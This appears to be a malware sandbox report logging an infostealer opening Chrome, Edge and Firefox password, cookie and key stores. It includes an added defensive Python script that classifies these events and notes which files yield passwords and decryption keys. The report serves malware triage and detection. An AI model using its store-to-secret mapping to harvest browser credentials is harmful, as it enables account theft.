Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
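The "File opened" list above is long mainly because of Windows' legacy per-user junctions: "Local Settings" points to AppData\Local, "Application Data" under the profile root points to AppData\Roaming, and "AppData\Local\Application Data" points back to AppData\Local, so a stealer that walks the profile and follows junctions re-enters the same directory and the sandbox logs the same store under ever longer aliases. The following script is an added example, not code from the Joe Sandbox report: it resolves those aliases, maps each opened file to the browser store it belongs to and what that store yields to an attacker, and deduplicates the result. The sample lines are transcribed from the report plus one constructed benign line; the store table and the event regex (which accepts the report's run-together "exeFile opened:" form as well as a " | " separator) are this example's own assumptions.

```python
"""Classify sandbox "File opened" events as browser credential-store access.

Added example; not code from the Joe Sandbox report. SAMPLE_EVENTS are
transcribed from the report (plus one constructed benign line); the junction
normalisation and the store tables are this example's own assumptions.
"""
import re

# Transcribed from the report above, plus one constructed benign line (last).
SAMPLE_EVENTS = [
    r"Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal",
    r"Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite",
    r"Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State",
    r"Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | File opened: C:\Users\user\Desktop\notes.txt",  # constructed, benign
]

# The report renders the two fields run together ("...exeFile opened:"); accept both forms.
EVENT_RE = re.compile(r"^Source: (?P<proc>.+?\.exe)(?: \| )?File opened: (?P<path>.+)$")

# Per-user compatibility junctions that exist on every Windows profile:
#   <profile>\Local Settings                 -> <profile>\AppData\Local
#   <profile>\Application Data               -> <profile>\AppData\Roaming
#   <profile>\AppData\Local\Application Data -> <profile>\AppData\Local   (a loop)
_PROFILE = r"^(?P<profile>[a-z]:\\users\\[^\\]+)\\"
_LOCAL_SETTINGS = re.compile(_PROFILE + r"local settings\\", re.IGNORECASE)
_ROAMING_ALIAS = re.compile(_PROFILE + r"application data\\", re.IGNORECASE)
_LOCAL_ALIAS = re.compile(r"\\appdata\\local\\application data\\", re.IGNORECASE)


def normalize_path(path: str) -> str:
    """Resolve the legacy junctions so every alias of a store compares equal."""
    path = _LOCAL_SETTINGS.sub(lambda m: m.group("profile") + "\\AppData\\Local\\", path)
    path = _ROAMING_ALIAS.sub(lambda m: m.group("profile") + "\\AppData\\Roaming\\", path)
    while _LOCAL_ALIAS.search(path):          # collapse the self-referencing junction
        path = _LOCAL_ALIAS.sub(lambda m: "\\AppData\\Local\\", path)
    return path


# Store file name (SQLite side-car suffix stripped) -> what it gives an attacker.
CHROMIUM_STORES = {
    "Login Data": "saved passwords (encrypted with the key from Local State)",
    "Login Data For Account": "saved passwords, account-bound store",
    "Cookies": "session cookies",
    "Extension Cookies": "extension cookies",
    "Local State": "os_crypt encrypted_key: DPAPI-wrapped AES key for the other stores",
}
FIREFOX_STORES = {
    "cookies.sqlite": "session cookies",
    "logins.json": "saved passwords (NSS-encrypted)",
    "key4.db": "NSS key database that decrypts logins.json",
}
SIDECAR_RE = re.compile(r"-(journal|wal|shm)$")   # SQLite journal/WAL/shm companions


def classify(path: str):
    """Return a dict describing the browser store behind `path`, or None."""
    norm = normalize_path(path)
    parts = norm.split("\\")
    fname = SIDECAR_RE.sub("", parts[-1])
    if "User Data" in parts:                   # Chromium layout: <vendor>\<browser>\User Data\<profile>\...
        i = parts.index("User Data")
        if fname in CHROMIUM_STORES:
            profile = "" if fname == "Local State" else parts[i + 1]
            return {"browser": "\\".join(parts[i - 2:i]), "profile": profile,
                    "store": fname, "meaning": CHROMIUM_STORES[fname], "path": norm}
    if "Firefox" in parts and "Profiles" in parts:
        i = parts.index("Profiles")
        if fname in FIREFOX_STORES:
            return {"browser": "Mozilla\\Firefox", "profile": parts[i + 1],
                    "store": fname, "meaning": FIREFOX_STORES[fname], "path": norm}
    return None


def parse_events(lines):
    """Parse report lines and keep only the ones that touch a known browser store."""
    hits = []
    for line in lines:
        m = EVENT_RE.match(line)
        if not m:
            continue
        hit = classify(m.group("path"))
        if hit:
            hit["process"] = m.group("proc")
            hits.append(hit)
    return hits


def summarize(hits):
    """Distinct (browser, store) pairs: the junction-loop noise collapses here."""
    return sorted({(h["browser"], h["store"]) for h in hits})


if __name__ == "__main__":
    found = parse_events(SAMPLE_EVENTS)
    for browser, store in summarize(found):
        print(f"{browser:<18} {store:<24} {CHROMIUM_STORES.get(store) or FIREFOX_STORES[store]}")
```

Run over the full list on the page, the summary shrinks the eighty-odd opens to a handful of (browser, store) pairs, which is the figure to put in a triage note; the raw count only measures how many times the walker looped. The "Local State" hit matters more than it looks: without the DPAPI-wrapped key stored there, the "Login Data" and "Cookies" databases are useless off-host.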

                                    Remote Access Functionality

Source: Yara match | File source: 00000005.00000002.1930693014.00000000137F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: serverBrokerperfMonitor.exe PID: 7580, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: uAsLgsGzSk.exe PID: 7860, type: MEMORYSTR
Source: Yara match | File source: hz7DzW2Yop.exe, type: SAMPLE
Source: Yara match | File source: 0.3.hz7DzW2Yop.exe.6a4eee9.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.hz7DzW2Yop.exe.6250ee9.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.serverBrokerperfMonitor.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.hz7DzW2Yop.exe.6a4eee9.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.hz7DzW2Yop.exe.6250ee9.0.unpack, type: UNPACKEDPE
